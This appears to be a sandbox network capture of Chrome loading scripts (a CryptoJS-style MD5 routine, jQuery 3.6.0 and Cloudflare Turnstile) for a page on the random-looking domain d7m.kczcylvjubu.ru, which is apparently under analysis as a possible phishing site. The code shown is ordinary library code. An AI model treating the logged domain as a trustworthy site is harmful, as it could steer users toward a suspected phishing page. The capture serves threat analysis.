                                                                                                        2024-12-18 22:16:48 UTC1369INData Raw: 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50
                                                                                                        Data Ascii: harAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKLMNOP
                                                                                                        2024-12-18 22:16:48 UTC1369INData Raw: 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f 3d 74 68 69
                                                                                                        Data Ascii: a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o=thi
                                                                                                        2024-12-18 22:16:48 UTC1369INData Raw: 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c 31 35 2c 41
                                                                                                        Data Ascii: ),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w,15,A


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.449748151.101.130.1374432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:48 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                        Host: code.jquery.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://d7m.kczcylvjubu.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:48 UTC613INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 89501
                                                                                                        Server: nginx
                                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                                        Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                        ETag: "28feccc0-15d9d"
                                                                                                        Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                                        Via: 1.1 varnish, 1.1 varnish
                                                                                                        Accept-Ranges: bytes
                                                                                                        Age: 3081740
                                                                                                        Date: Wed, 18 Dec 2024 22:16:48 GMT
                                                                                                        X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740043-EWR
                                                                                                        X-Cache: HIT, HIT
                                                                                                        X-Cache-Hits: 2774, 0
                                                                                                        X-Timer: S1734560208.409908,VS0,VE1
                                                                                                        Vary: Accept-Encoding
                                                                                                        2024-12-18 22:16:48 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                        Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                        2024-12-18 22:16:48 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                        Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                        2024-12-18 22:16:48 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                        Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                        2024-12-18 22:16:48 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                        Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                        2024-12-18 22:16:48 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                        Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                        2024-12-18 22:16:48 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                        Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                        2024-12-18 22:16:48 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                        Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                        2024-12-18 22:16:48 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                        Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                        2024-12-18 22:16:48 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                        Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                        2024-12-18 22:16:48 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                        Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.449751104.18.94.414432504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-18 22:16:49 UTC649OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                        Host: challenges.cloudflare.com
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: */*
                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: script
                                                                                                        Referer: https://d7m.kczcylvjubu.ru/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2024-12-18 22:16:50 UTC471INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 18 Dec 2024 22:16:50 GMT
                                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                                        Content-Length: 47692
                                                                                                        Connection: close
                                                                                                        accept-ranges: bytes
                                                                                                        last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                        cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                        access-control-allow-origin: *
                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f428504d9044302-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        2024-12-18 22:16:50 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                        Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                        2024-12-18 22:16:50 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                        Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                        2024-12-18 22:16:50 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                        Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
